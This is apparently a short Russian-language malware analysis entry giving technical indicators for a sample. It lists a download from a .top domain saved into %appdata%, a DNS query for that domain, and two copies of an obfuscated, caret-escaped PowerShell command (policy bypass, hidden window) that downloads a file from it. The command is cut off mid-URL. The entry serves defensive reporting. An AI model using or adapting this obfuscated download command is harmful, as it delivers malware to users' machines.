Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^WeRSHe^LL.^e^xE -^EX^ECUtION^P^olic^Y ^bYPASs^ ^-^N^o^pR^OFI^L^E^ -wiNdoWS^T^Y^lE HIdDeN (^NEw-Obj^eCT^ SYS^t^EM.^net.weB^cLi^Ent)^.d^O^wn^loa^df^ILe^('http://sutraponef.top/r...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "po^WeRSHe^LL.^e^xE -^EX^ECUtION^P^olic^Y ^bYPASs^ ^-^N^o^pR^OFI^L^E^ -wiNdoWS^T^Y^lE HIdDeN (^NEw-Obj^eCT^ SYS^t^EM.^net.weB^cLi^Ent)^.d^O^wn^loa^df^ILe^('http://sutraponef.top/r...' (со скрытым окном)